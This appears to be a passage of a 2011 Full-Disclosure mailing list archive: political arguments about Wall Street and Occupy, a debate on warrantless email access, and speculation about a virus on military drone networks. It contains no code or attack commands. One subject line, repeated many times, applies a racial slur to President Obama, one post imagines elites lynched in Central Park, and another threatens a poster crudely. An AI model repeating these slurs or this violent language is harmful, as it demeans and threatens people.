Regarding who's doing the most damage to US economy, I'll just say I won't comment. I take issue with the 1%/99% idea; ie, the excuse that some people deserve more just because they are allowed to lie - even if it makes them hypocrites. On Wed, Oct 12, 2011 at 9:40 AM, Jeffrey Walton noloa...@gmail.com wrote: On Wed, Oct 12, 2011 at 2:51 AM, Christian Sciberras uuf6...@gmail.com wrote: Darren's and indeed many other people's lame excuse is that they're too humble to be greedy. As if! Its not about greed - pursuit of wealth is fine. You just can't harm others while doing it. (Well, apparently you can in the US). One of the funniest things I ever read regarding Bin Laden's little war was a boycott of the US dollar to reduce reliance [on the dollar] and to harm the US economy [1]. Thought experiment: terrorist wanted to ruin the US economy. US Financial institutions threw the US (and world) economy into a recession (again). The US financial institutions responsible must be terrorist organizations. Thank {insert higher being here} that Bin Laden did not make a PAC contribution on 9/10. Jeff [1] http://www.nytimes.com/2010/01/30/world/middleeast/30binladen.html On Tue, Oct 11, 2011 at 6:07 PM, Jeffrey Walton noloa...@gmail.com wrote: On Tue, Oct 11, 2011 at 9:25 AM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: Chris - Empathy, guilt, and morals. Guilt being a major factor. The possibility was always there to make millions via evil means, but morals and knowing it would be hard to live with. The problem is not getting lots of money. That is the easy part. The issue is with living with yourself afterward. How about illegal? Check out the Hobbs Act [1]. I'm not making this crap up - the US has laws on the books for negatively affecting commerce (which the crash did), and using fear to peddle their warez (how financial institutions market their instruments). There's probably provisions in the PATRIOT Act, too. The last tine I checked (about a year ago), the SEC had opened fewer than 100 civil investigations. No criminal investigations, despite the fact that some of the financial institutions created spurious ratings companies just to rate their instruments 'good'. Jeff [1] http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/131mcrm.htm [SNIP] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Search and Seizure of Email
Well said! On Wed, Oct 12, 2011 at 5:16 PM, Daniel Sichel dani...@ponderosatel.comwrote: In fact, law enforcement officials don?t even need a search warrant to access private emails. In point of fact, nobody does, although acquiring this access is clearly easier for law enforcement. One of the burdens that the freedom the Internet brings, is the freedom. Your email is out there, typically unencrypted, available to anyone who can snatch the packets off the wire, Any ISP employee with appropriate read rights on a mail server. Take responsibility for your own email. Encrypt it if you must, but for heaven sakes, own the fact that it is publicly visible. If we do not take responsibility for our own email and whine about others reading it, than there will HAVE to be regulations by government to protect us. That's what government does. That's what it is SUPPOSED to do. So before we invite Godzilla to protect our email, how about we just man up and take responsibility ourselves? But that's just the idea of a bunch of dead white guys like Edmund Burke, John Adams and James Madison, and what do they know? Dan Sichel ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Search and Seizure of Email
I think you meant there is no guarantee that email is encrypted. You don't know if a provider is actually encrypting your mail unless you're doing this yourself. That's why there is no push. On Wed, Oct 12, 2011 at 5:54 PM, Laurelai laure...@oneechan.org wrote: On 10/12/2011 10:33 AM, Christian Sciberras wrote: Well said! On Wed, Oct 12, 2011 at 5:16 PM, Daniel Sichel dani...@ponderosatel.comwrote: In fact, law enforcement officials don?t even need a search warrant to access private emails. In point of fact, nobody does, although acquiring this access is clearly easier for law enforcement. One of the burdens that the freedom the Internet brings, is the freedom. Your email is out there, typically unencrypted, available to anyone who can snatch the packets off the wire, Any ISP employee with appropriate read rights on a mail server. Take responsibility for your own email. Encrypt it if you must, but for heaven sakes, own the fact that it is publicly visible. If we do not take responsibility for our own email and whine about others reading it, than there will HAVE to be regulations by government to protect us. That's what government does. That's what it is SUPPOSED to do. So before we invite Godzilla to protect our email, how about we just man up and take responsibility ourselves? But that's just the idea of a bunch of dead white guys like Edmund Burke, John Adams and James Madison, and what do they know? Dan Sichel ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Well there is no push to make snail-mail encrypted and lets face it most peoples mailboxes don't have any sort of locking mechanisms and is available to anyone with two hands and the malicious intent to steal someones mail however the US Gov needs a warrant to intercept your physical mail, why does it being online somehow make it different? Especially considering the US Postal service keeps threatening to shut down, and this is due to the increased popularity of *email*. Why this should be troubling is that they consider email somehow different than physical mail when it comes to privacy rights for no really good reason, and considering that one of the grievances we had with England in the time of the revolutionary war was the government intercepting mail for arbitrary reasons. This should make every American citizen's hair stand on end. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Wipe off, rub out, reappear...
Uhm, how do you know? As much as I think it unlikely, they might have actually analyzed the executable and found it doesn't do that sort of thing. On Tue, Oct 11, 2011 at 1:45 AM, Bob Dobbs bobd10...@gmail.com wrote: On Mon, Oct 10, 2011 at 4:31 PM, Michael Schmidt mschm...@drugstore.comwrote: If its bot net code and it is behind an air barrier then it will never phone home. They It already broke the air wall to get in. It can certainly do so to get out. Bob ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Wipe off, rub out, reappear...
If you ask me, you sound like bragging on something you wrote. Either that, or you're clueless to what you are saying. Just because my younger brother won't understand 5 lines of code I wrote doesn't make my 5 liner smart... Applying the analogy here, just because they're possibly clueless to how OS internals work doesn't mean the virus is doing anything particularly smart. On Tue, Oct 11, 2011 at 1:55 AM, xD 0x41 sec...@gmail.com wrote: Is obvious, this is a very well made executable :) Or, set up well to spread and then hide, and doing so with even its phone home, wich is normal nowdays, for example consider an ircd, it uses PING/PONG, what if you change the rfc, and use ascii characters,then do this to the bot, remove USER mode completely only allow it for set modes/opers, and then try take the thing down, if it is connected thru about 40 different ips and does not rely on dynami dns... it is not impossible, it is happening now, and, it is also visible, however, these c7c centres are so advanced, Ids are just not getting enough info...you cannot do a thing on the properly modified control centres, and, i have seen that code, it is extremely modified version of ircd... it cannot be used by a NOn operator, and uses a totally different rfc to phopne home etc, thus making conventional methods used atm, useless... as they will loook for the strings that they know, and always ids will perform some string of commands, and, then slowly the operator sees the servers, and one by one he blocks YOU out of his network. This is a dog eat dog world, bot masters can be exceptionallt ingenious when it comes to these things, and masking an exe nowdays, is not as simple as some peoples SFX rar kits :) So even kits nowdays, can be way more advanced than 2008/2009 even... there has been a burst of tech, so there is also a burst in virus numbers... but, smart cc centres, you wont take down so easily, and they will move before you can even decrypt theyre settings... wich is exactly why stuxnet is non stoppable.. unless the owner shuuts it down, it wont be killed.. xd On 11 October 2011 10:45, Bob Dobbs bobd10...@gmail.com wrote: On Mon, Oct 10, 2011 at 4:31 PM, Michael Schmidt mschm...@drugstore.comwrote: If its bot net code and it is behind an air barrier then it will never phone home. They It already broke the air wall to get in. It can certainly do so to get out. Bob ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Wipe off, rub out, reappear...
I already beat you up to it - you know nothing about their setup. You don't know if their infection is the result of a botnet. I don't deny you know anything about botnets, I'm just saying from the looks of it you jumped to a load of conclusion without any proof whatsoever. On Tue, Oct 11, 2011 at 12:11 PM, xD 0x41 sec...@gmail.com wrote: screwit, im a bite, i know my shit here.. If i was not so smart, then i guess i would not have a modified ircd wich is similar... wow i know.. just seems you dont know crap about cc botnets , thats fo sure. I think i outlined a *good* setup, as i have seen it, or would not bothered to state the mods made.. is that simple. wwether it is hard t code or not, is not my business, nor i care for.. I just know, how they run, and, dont try bs me about what i do and dont know, because on this topic son, i have plenty of experience, and could easily match this with an AV spokesperson, and would not hesitate to, but what gains it to me ? None. I am here for those who give a crap, you sir, no nothing, atall, about even the controlling side of a good botnet wich, spreads fast. Most people, simply do not want you on them, then the better ones, simply hide as users on irc anyhow ;) Then again, i wouldnt know shit ey. gnite :-) have fun trying to pick apart anything with me in this area, i will enjoy tearing your anus out, word by word if i have to. xd On 11 October 2011 20:29, Christian Sciberras uuf6...@gmail.com wrote: If you ask me, you sound like bragging on something you wrote. Either that, or you're clueless to what you are saying. Just because my younger brother won't understand 5 lines of code I wrote doesn't make my 5 liner smart... Applying the analogy here, just because they're possibly clueless to how OS internals work doesn't mean the virus is doing anything particularly smart. On Tue, Oct 11, 2011 at 1:55 AM, xD 0x41 sec...@gmail.com wrote: Is obvious, this is a very well made executable :) Or, set up well to spread and then hide, and doing so with even its phone home, wich is normal nowdays, for example consider an ircd, it uses PING/PONG, what if you change the rfc, and use ascii characters,then do this to the bot, remove USER mode completely only allow it for set modes/opers, and then try take the thing down, if it is connected thru about 40 different ips and does not rely on dynami dns... it is not impossible, it is happening now, and, it is also visible, however, these c7c centres are so advanced, Ids are just not getting enough info...you cannot do a thing on the properly modified control centres, and, i have seen that code, it is extremely modified version of ircd... it cannot be used by a NOn operator, and uses a totally different rfc to phopne home etc, thus making conventional methods used atm, useless... as they will loook for the strings that they know, and always ids will perform some string of commands, and, then slowly the operator sees the servers, and one by one he blocks YOU out of his network. This is a dog eat dog world, bot masters can be exceptionallt ingenious when it comes to these things, and masking an exe nowdays, is not as simple as some peoples SFX rar kits :) So even kits nowdays, can be way more advanced than 2008/2009 even... there has been a burst of tech, so there is also a burst in virus numbers... but, smart cc centres, you wont take down so easily, and they will move before you can even decrypt theyre settings... wich is exactly why stuxnet is non stoppable.. unless the owner shuuts it down, it wont be killed.. xd On 11 October 2011 10:45, Bob Dobbs bobd10...@gmail.com wrote: On Mon, Oct 10, 2011 at 4:31 PM, Michael Schmidt mschm...@drugstore.com wrote: If its bot net code and it is behind an air barrier then it will never phone home. They It already broke the air wall to get in. It can certainly do so to get out. Bob ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
I'm confident in knowing that many would agree to not to trust a single word of what you're saying. You might have touched the heart of many with the excuse of being poor, but you won't sell the lie that you're not well off because of a pure heart to anyone. On Tue, Oct 11, 2011 at 3:25 PM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: Chris - Empathy, guilt, and morals. Guilt being a major factor. The possibility was always there to make millions via evil means, but morals and knowing it would be hard to live with. The problem is not getting lots of money. That is the easy part. The issue is with living with yourself afterward. On Tue, Oct 11, 2011 at 12:43 AM, Bob Dobbs bobd10...@gmail.com wrote: On Mon, Oct 10, 2011 at 10:57 AM, Jeffrey Walton noloa...@gmail.comwrote: Who are the real threats to the US: terrorist who try to dream up ways to do the US harm, or Corporate and Congress which does the US harm? I hate to contribute to an off-topic thread but you've successfully trolled me here: Congress has done FAR more harm to the US than terrorists over the last 10 years by just about every measure. Bob ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
He who believes the 99% are not guilty of greed is a downright fool. The 1%? I don't care. Honestly, I don't. Fun quote (from the 99% crowd): Why does the 1% deserve a Ferrari and I don't?! On Mon, Oct 10, 2011 at 10:43 AM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: The day may come when Wall Street is finally silent, the slowly rotting carcasses of the power hungry elites swinging silently from the trees in Central park, the lynch mob finally satiated... But will anything change? Greed will always exist, there will always be those who think they can get away with this kind of thing. Funny how it finally has the President interested, maybe we can have change now? On Thu, Oct 6, 2011 at 7:54 PM, Jeffrey Walton noloa...@gmail.com wrote: On Thu, Oct 6, 2011 at 1:21 PM, Georgi Guninski gunin...@guninski.com wrote: American people understand that not everybody's been following the rules, he said. These days, a lot of folks doing the right thing are not rewarded. A lot of folks who are not doing the right thing are rewarded. From the article: : President Obama on Thursday called the Occupy Wall : Street protests a reflection of a broad-based frustration : about how our financial system works and pledged to : continue fighting to protect American consumers. I seem to recall what Obama said at a banker's luncheon after he took office (to paraphrase): My administration is the only thing saving you from the pitchforks of the American people. It seems to me he took great pride in the protection he provided to the economic terrorists. I hope he chokes on the money the industry is stuffing in his pockets. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
What's that got to do with everything? You can't go force everyone to wear thorn jeans just because you feel inferior when faced with a formal suit. That, as well as the fact that the guy that got $1M in his bank account rightly has what to brag about. If you just can't get over it, get that iPhone and buy an app for your problem (yes, there's an app for that!) :) On Mon, Oct 10, 2011 at 12:28 PM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: We all are guilty, that is true. I can admit to that. Though what I intensely dislike are those who think they are better than us - because they are more successful at being greedy pigs. On Mon, Oct 10, 2011 at 9:54 AM, Christian Sciberras uuf6...@gmail.comwrote: He who believes the 99% are not guilty of greed is a downright fool. The 1%? I don't care. Honestly, I don't. Fun quote (from the 99% crowd): Why does the 1% deserve a Ferrari and I don't?! On Mon, Oct 10, 2011 at 10:43 AM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: The day may come when Wall Street is finally silent, the slowly rotting carcasses of the power hungry elites swinging silently from the trees in Central park, the lynch mob finally satiated... But will anything change? Greed will always exist, there will always be those who think they can get away with this kind of thing. Funny how it finally has the President interested, maybe we can have change now? On Thu, Oct 6, 2011 at 7:54 PM, Jeffrey Walton noloa...@gmail.comwrote: On Thu, Oct 6, 2011 at 1:21 PM, Georgi Guninski gunin...@guninski.com wrote: American people understand that not everybody's been following the rules, he said. These days, a lot of folks doing the right thing are not rewarded. A lot of folks who are not doing the right thing are rewarded. From the article: : President Obama on Thursday called the Occupy Wall : Street protests a reflection of a broad-based frustration : about how our financial system works and pledged to : continue fighting to protect American consumers. I seem to recall what Obama said at a banker's luncheon after he took office (to paraphrase): My administration is the only thing saving you from the pitchforks of the American people. It seems to me he took great pride in the protection he provided to the economic terrorists. I hope he chokes on the money the industry is stuffing in his pockets. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] “We keep wiping it off, and it keeps coming back”
http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/ This is news to me. Moreover, I'm a bit confused as to how they don't track how it's coming back. I mean, how is it possible that no one stepped in and analyzed how the virus acts and where it came from? It sounds fish if you ask me. Chris. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
Yeah Darren, wish we all could get off like that $1M guy, screwing off hardworking people while doing nothing. That'd be the life. Wonder what's stopping us all from doing it? On Mon, Oct 10, 2011 at 3:41 PM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: iPhones... Why sir, surely you know a Nokia 3210 is far superior in conditions where it may be dropped? Sure, the guy with $1,000,000 can brag if he wants. Just if he has screwed over thousands of hardworking people to get that, and sees hisself as untouchable... Then he should suffer the consequences of his unsavory actions. On Mon, Oct 10, 2011 at 1:32 PM, Kain, Rebecca (.) bka...@ford.comwrote: Yes, why say anything that way??? -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Thor (Hammer of God) Sent: Thursday, October 06, 2011 1:31 PM To: Georgi Guninski; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules No offense intended??? How you expect to refer to the President of the United States as a nigger and NOT offend people? You crossed WAY over the line on that one, joro. WAY over. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Georgi Guninski Sent: Thursday, October 06, 2011 10:22 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules risking n3td3v fate, sorry for offtopic. the nigger said [1] (no offense intended to black people): American people understand that not everybody's been following the rules, he said. These days, a lot of folks doing the right thing are not rewarded. A lot of folks who are not doing the right thing are rewarded. [1] http://www.cbsnews.com/8301-503544_162-20116707-503544.html -- joro ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
I'm talking more about their engineers than their network. If I had my network infected with a virus, I'd immediately deploy some form of logging/monitoring tool (eg, wireshark). Honestly, it all sounds like they're employing inexperienced engineers. Which is again strange, considering the field they're in. Regarding your bet, see that's already something. Why exactly can't they verify your bet? It isn't like viruses suddenly became invisible, is it? I'm just curious to these questions. It's strange to hear someone saying we basically have no idea what's going on. On Mon, Oct 10, 2011 at 3:40 PM, Michael T mt2410...@gmail.com wrote: It's a network that's 'detached', or 'segregated', or whatevered from the rest of the world, so it's 'largely immune to viruses'. That likely means they have: 1. NO logging 2. NO anti-virus 3. NO hardening The very fact that these systems are on a segregated network means they are probably more frail, and more susceptible to viruses, than a normal person's laptop. Immune to viruses... What a crock of shit. My bet is that it's coming from the planes. Mike On Mon, Oct 10, 2011 at 7:51 AM, Christian Sciberras uuf6...@gmail.comwrote: http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/ This is news to me. Moreover, I'm a bit confused as to how they don't track how it's coming back. I mean, how is it possible that no one stepped in and analyzed how the virus acts and where it came from? It sounds fish if you ask me. Chris. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
Since it very much discredits and puts the AA to shame, isn't it quite plausible that some department's lawyers fall over this guy's claims? Maybe the article has been written specifically for people to draw the wrong conclusion - happens too often - but still... On Mon, Oct 10, 2011 at 7:36 PM, Thor (Hammer of God) t...@hammerofgod.comwrote: Consider the source. It’s “someone close” to the operations, and that only according to this guy. It could very well be a slot-puller in the casino across the street… I’m always dubious of the reporting of this type of thing where the source is some “secret” person, and where there is never any ability to refute claims. ** ** t ** ** *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Christian Sciberras *Sent:* Monday, October 10, 2011 7:05 AM *To:* Michael T *Cc:* full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back” ** ** I'm talking more about their engineers than their network. ** ** If I had my network infected with a virus, I'd immediately deploy some form of logging/monitoring tool (eg, wireshark). ** ** Honestly, it all sounds like they're employing inexperienced engineers. Which is again strange, considering the field they're in. ** ** Regarding your bet, see that's already something. Why exactly can't they verify your bet? It isn't like viruses suddenly became invisible, is it?** ** ** ** I'm just curious to these questions. It's strange to hear someone saying we basically have no idea what's going on. ** ** ** ** On Mon, Oct 10, 2011 at 3:40 PM, Michael T mt2410...@gmail.com wrote:*** * It's a network that's 'detached', or 'segregated', or whatevered from the rest of the world, so it's 'largely immune to viruses'. That likely means they have: 1. NO logging 2. NO anti-virus 3. NO hardening The very fact that these systems are on a segregated network means they are probably more frail, and more susceptible to viruses, than a normal person's laptop. Immune to viruses... What a crock of shit. My bet is that it's coming from the planes. Mike On Mon, Oct 10, 2011 at 7:51 AM, Christian Sciberras uuf6...@gmail.com wrote: http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/ ** ** This is news to me. ** ** Moreover, I'm a bit confused as to how they don't track how it's coming back. I mean, how is it possible that no one stepped in and analyzed how the virus acts and where it came from? ** ** It sounds fish if you ask me. ** ** Chris. ** ** ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ** ** ** ** ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
That would make the joke of the year. No, REALLY. On Mon, Oct 10, 2011 at 6:08 PM, Dave m...@propergander.org.uk wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 10/10/2011 15:01, Christian Sciberras wrote: Yeah Darren, wish we all could get off like that $1M guy, screwing off hardworking people while doing nothing. That'd be the life. Wonder what's stopping us all from doing it? A social conscience? Empathy? Do unto others...? All three of the above? I know that's why I'm not rich. On Mon, Oct 10, 2011 at 3:41 PM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: iPhones... Why sir, surely you know a Nokia 3210 is far superior in conditions where it may be dropped? Sure, the guy with $1,000,000 can brag if he wants. Just if he has screwed over thousands of hardworking people to get that, and sees hisself as untouchable... Then he should suffer the consequences of his unsavory actions. On Mon, Oct 10, 2011 at 1:32 PM, Kain, Rebecca (.) bka...@ford.com wrote: Yes, why say anything that way??? -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Thor (Hammer of God) Sent: Thursday, October 06, 2011 1:31 PM To: Georgi Guninski; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules No offense intended??? How you expect to refer to the President of the United States as a nigger and NOT offend people? You crossed WAY over the line on that one, joro. WAY over. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Georgi Guninski Sent: Thursday, October 06, 2011 10:22 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules risking n3td3v fate, sorry for offtopic. the nigger said [1] (no offense intended to black people): American people understand that not everybody's been following the rules, he said. These days, a lot of folks doing the right thing are not rewarded. A lot of folks who are not doing the right thing are rewarded. [1] http://www.cbsnews.com/8301-503544_162-20116707-503544.html -- joro ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTpMYgbIvn8UFHWSmAQJW0ggAsnx4qDO0PEbf57DsUmg5Yqx4/Adr95ZD QqOEYDC2IuwEdypX6uwtk6PDY3/pIfO44ulqXEjoIpW1z5DRUmokB3/wGF1/LzOU xO9bABpy2JrewnTxe0pkZTUct2s6egME4D/t3RQ4gG05OYw4LvOq47lHn+Qkm6jP VOzbduAXL+fiUOyGlR487houK7FeRePagMlufLzDOVtr8xn1y0nKOdYMGSnsrFBM zf1aZRkwNibz9+5bc5i9JgSbqV6mOXE9icF1vsmcx/u8J8AxN0eWyPibV5MYg1wv lk9KB7RgUz5srBInubuCKR0wMV/s4+MPp81qa382G8qOY+jKKy9pUg== =miIQ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
Well, I know a local datacenter (can't be more than 10 years old) makes use of a Faraday cage around it. And it doesn't really keep any mission-critical equipment, so I guess others out there do the same. Depending on the type of cage/shielding (don't know about the local one) it can completely block communications... On Mon, Oct 10, 2011 at 10:17 PM, Michael Schmidt mschm...@drugstore.comwrote: I have no idea, I assume – this is usually what they mean when they talk about an “air barrier” ** ** *From:* evejou [mailto:g...@techn0ev3.net] *Sent:* Monday, October 10, 2011 1:04 PM *To:* Michael Schmidt *Cc:* Thor (Hammer of God); Christian Sciberras; Michael T; full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back” ** ** As someone kind of young (and thus no historical recollection), I'm kind of surprised that this is talked about in past-tense. Does this not happen anymore? I could see how this could get super annoying after awhile. ** ** ** ** On Mon, Oct 10, 2011 at 2:09 PM, Michael Schmidt mschm...@drugstore.com wrote: I know in the old days (15 years ago) – there were networks that were completely separate from the outside world. I remember trying to do telephone tech support to someone on a secure network… Tell him to do “this” He puts down the phone, goes through physical security, tries “this” He comes back though security picks up phone talks to me. Security allowed nothing that looked like portable storage in or out of the secure area. Rinse. Repeat. Couldn’t even place outside voice calls from the secure network area. I don’t know if they do this today. I also know that there used to be setups with removable hard drives where one drive connected you to the secure network and yet another drive connected to the unsecure network. – Two different network cards each enabled for different networks. The good old days *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Thor (Hammer of God) *Sent:* Monday, October 10, 2011 10:36 AM *To:* Christian Sciberras; Michael T *Cc:* full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back” Consider the source. It’s “someone close” to the operations, and that only according to this guy. It could very well be a slot-puller in the casino across the street… I’m always dubious of the reporting of this type of thing where the source is some “secret” person, and where there is never any ability to refute claims. t *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Christian Sciberras *Sent:* Monday, October 10, 2011 7:05 AM *To:* Michael T *Cc:* full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back” I'm talking more about their engineers than their network. If I had my network infected with a virus, I'd immediately deploy some form of logging/monitoring tool (eg, wireshark). Honestly, it all sounds like they're employing inexperienced engineers. Which is again strange, considering the field they're in. Regarding your bet, see that's already something. Why exactly can't they verify your bet? It isn't like viruses suddenly became invisible, is it?** ** I'm just curious to these questions. It's strange to hear someone saying we basically have no idea what's going on. On Mon, Oct 10, 2011 at 3:40 PM, Michael T mt2410...@gmail.com wrote:*** * It's a network that's 'detached', or 'segregated', or whatevered from the rest of the world, so it's 'largely immune to viruses'. That likely means they have: 1. NO logging 2. NO anti-virus 3. NO hardening The very fact that these systems are on a segregated network means they are probably more frail, and more susceptible to viruses, than a normal person's laptop. Immune to viruses... What a crock of shit. My bet is that it's coming from the planes. Mike On Mon, Oct 10, 2011 at 7:51 AM, Christian Sciberras uuf6...@gmail.com wrote: http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/ This is news to me. Moreover, I'm a bit confused as to how they don't track how it's coming back. I mean, how is it possible that no one stepped in and analyzed how the virus acts and where it came from? It sounds fish if you ask me. Chris. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored
Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
